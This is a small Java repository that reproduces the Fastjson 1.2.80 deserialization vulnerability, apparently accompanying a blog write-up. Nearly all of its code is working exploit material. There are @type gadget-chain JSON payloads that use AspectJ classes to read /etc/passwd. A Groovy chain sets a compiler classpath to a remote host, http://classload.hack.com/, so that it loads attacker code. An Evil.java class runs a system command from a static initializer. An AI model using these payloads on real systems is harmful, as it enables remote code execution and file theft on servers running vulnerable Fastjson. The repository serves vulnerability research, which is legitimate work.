├── .gitignore
├── .idea
├── encodings.xml
├── misc.xml
├── vcs.xml
└── workspace.xml
├── README.md
├── pom.xml
└── src
└── main
└── java
├── Evil.java
├── aspectj.java
└── groovy.java
/.gitignore:
--------------------------------------------------------------------------------
1 | target/
2 | !.mvn/wrapper/maven-wrapper.jar
3 | !**/src/main/**/target/
4 | !**/src/test/**/target/
5 |
6 | ### IntelliJ IDEA ###
7 | .idea/modules.xml
8 | .idea/jarRepositories.xml
9 | .idea/compiler.xml
10 | .idea/libraries/
11 | *.iws
12 | *.iml
13 | *.ipr
14 |
15 | ### Eclipse ###
16 | .apt_generated
17 | .classpath
18 | .factorypath
19 | .project
20 | .settings
21 | .springBeans
22 | .sts4-cache
23 |
24 | ### NetBeans ###
25 | /nbproject/private/
26 | /nbbuild/
27 | /dist/
28 | /nbdist/
29 | /.nb-gradle/
30 | build/
31 | !**/src/main/**/build/
32 | !**/src/test/**/build/
33 |
34 | ### VS Code ###
35 | .vscode/
36 |
37 | ### Mac OS ###
38 | .DS_Store
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 | {
37 | "keyToString": {
38 | "RunOnceActivity.OpenProjectViewOnStart": "true",
39 | "RunOnceActivity.ShowReadmeOnStart": "true",
40 | "SHARE_PROJECT_CONFIGURATION_FILES": "true",
41 | "WebServerToolWindowFactoryState": "false"
42 | }
43 | }
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | 1662006632255
71 |
72 |
73 | 1662006632255
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
98 |
99 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | [Fastjson1.2.80漏洞复现](https://hosch3n.github.io/2022/09/01/Fastjson1-2-80%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/)
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | FastjsonVulns
9 | 1.0-SNAPSHOT
10 |
11 |
12 | 8
13 | 8
14 | UTF-8
15 |
16 |
17 |
18 |
19 | com.alibaba
20 | fastjson
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | 1.2.80
29 |
30 |
31 |
32 | org.aspectj
33 | aspectjtools
34 | 1.9.7
35 |
36 |
37 |
38 | org.codehaus.groovy
39 | groovy-all
40 | 3.0.12
41 | pom
42 |
43 |
44 |
45 |
--------------------------------------------------------------------------------
/src/main/java/Evil.java:
--------------------------------------------------------------------------------
1 | import java.io.IOException;
2 | import org.codehaus.groovy.ast.ASTNode;
3 | import org.codehaus.groovy.control.SourceUnit;
4 | import org.codehaus.groovy.transform.ASTTransformation;
5 | import org.codehaus.groovy.transform.GroovyASTTransformation;
6 |
7 | @GroovyASTTransformation
8 | public class Evil implements ASTTransformation {
9 | public void visit(ASTNode[] astNodes, SourceUnit sourceUnit) {
10 | }
11 |
12 | static {
13 | try {
14 | Runtime.getRuntime().exec("gnome-calculator");
15 | } catch (IOException var1) {
16 | throw new RuntimeException(var1);
17 | }
18 | }
19 | }
--------------------------------------------------------------------------------
/src/main/java/aspectj.java:
--------------------------------------------------------------------------------
1 | import com.alibaba.fastjson.JSON;
2 |
3 | public class aspectj {
4 | private static String poc1 = "{\n" +
5 | " \"@type\":\"java.lang.Exception\",\n" +
6 | " \"@type\":\"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\"\n" +
7 | "}";
8 |
9 | private static String poc2 = "{\n" +
10 | " \"@type\":\"java.lang.Class\",\n" +
11 | " \"val\":{\n" +
12 | " \"@type\":\"java.lang.String\"{\n" +
13 | " \"@type\":\"java.util.Locale\",\n" +
14 | " \"val\":{\n" +
15 | " \"@type\":\"com.alibaba.fastjson.JSONObject\",{\n" +
16 | " \"@type\":\"java.lang.String\"\n" +
17 | " \"@type\":\"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\",\n" +
18 | " \"newAnnotationProcessorUnits\":[{}]\n" +
19 | " }\n" +
20 | " }\n" +
21 | " }";
22 |
23 | private static String poc3 = "{\n" +
24 | " \"x\":{\n" +
25 | " \"@type\":\"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\n" +
26 | " \"@type\":\"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\n" +
27 | " \"fileName\":\"/etc/passwd\"\n" +
28 | " }\n" +
29 | "}";
30 |
31 | public static void main(String[] args) {
32 | JSON.parseObject(poc1);
33 | try {
34 | JSON.parseObject(poc2);
35 | } catch (Exception e){}
36 | System.out.println(JSON.parseObject(poc3));
37 | }
38 |
39 | }
40 |
--------------------------------------------------------------------------------
/src/main/java/groovy.java:
--------------------------------------------------------------------------------
1 | import com.alibaba.fastjson.JSON;
2 |
3 | public class groovy {
4 | private static String poc1 = "{\n" +
5 | " \"@type\":\"java.lang.Exception\",\n" +
6 | " \"@type\":\"org.codehaus.groovy.control.CompilationFailedException\",\n" +
7 | " \"unit\":{}\n" +
8 | "}";
9 |
10 | private static String poc2 = "{\n" +
11 | " \"@type\":\"org.codehaus.groovy.control.ProcessingUnit\",\n" +
12 | " \"@type\":\"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit\",\n" +
13 | " \"config\":{\n" +
14 | " \"@type\":\"org.codehaus.groovy.control.CompilerConfiguration\",\n" +
15 | " \"classpathList\":\"http://classload.hack.com/\"\n" +
16 | " }\n" +
17 | "}";
18 |
19 | /*
20 | META-INF/services/org.codehaus.groovy.transform.ASTTransformation
21 | Evil
22 |
23 | Evil.class
24 | */
25 |
26 | public static void main(String[] args) {
27 | try {
28 | JSON.parseObject(poc1);
29 | } catch (Exception e){}
30 |
31 | JSON.parseObject(poc2);
32 | }
33 |
34 | }
35 |
--------------------------------------------------------------------------------